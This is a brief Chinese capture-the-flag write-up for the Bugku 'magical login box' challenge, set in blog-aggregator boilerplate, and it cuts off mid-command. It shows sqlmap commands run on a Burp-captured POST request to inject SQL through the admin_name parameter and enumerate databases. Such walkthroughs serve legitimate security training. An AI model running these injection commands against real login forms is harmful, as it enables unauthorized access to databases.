bugku-這是一個神奇的登陸框
打開http://123.206.87.240:9001/sql/後是個登陸界面 查看源代碼 於是考慮到sql注入,因爲是post,所以將burp的抓到的包保存到1.txt中,用sqlmap抓包 命令:sqlmap.py -r 1.txt -p admin_name --dbs//爆數據庫名 後續在保表、列以及數據 命令sqlmap.py -r 1.txt -p admin_name -D bug
相關文章
- 1. bugku---這是一個神奇的登陸框 (burp配合sqlmap實例)
- 2. BugkuCTF 這是一個神奇的登陸框
- 3. BugkuCTF之web題之這是一個神奇的登錄框
- 4. *這是一條神奇的天路*
- 5. 一個登陸框實現不一樣的登陸驗證
- 6. 8月份 是一個神奇的月份,作一個神奇的網站
- 7. 碼農是一個神奇的行業
- 8. 我是這樣搞懂一個神奇的BUG
- 9. 一個登陸框引起的血案
- 10. 一個神奇的BUG
- 更多相關文章...
- • 第一個MyBatis程序 - MyBatis教程
- • 第一個Hibernate程序 - Hibernate教程
- • Docker容器實戰(一) - 封神Server端技術
- • 再有人問你分佈式事務,把這篇扔給他
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 升級Gradle後報錯Gradle‘s dependency cache may be corrupt (this sometimes occurs
- 2. Smarter, Not Harder
- 3. mac-2019-react-native 本地環境搭建(xcode-11.1和android studio3.5.2中Genymotion2.12.1 和VirtualBox-5.2.34 )
- 4. 查看文件中關鍵字前後幾行的內容
- 5. XXE萌新進階全攻略
- 6. Installation failed due to: ‘Connection refused: connect‘安卓studio端口占用
- 7. zabbix5.0通過agent監控winserve12
- 8. IT行業UI前景、潛力如何?
- 9. Mac Swig 3.0.12 安裝
- 10. Windows上FreeRDP-WebConnect是一個開源HTML5代理,它提供對使用RDP的任何Windows服務器和工作站的Web訪問
歡迎關注本站公眾號,獲取更多信息
相關文章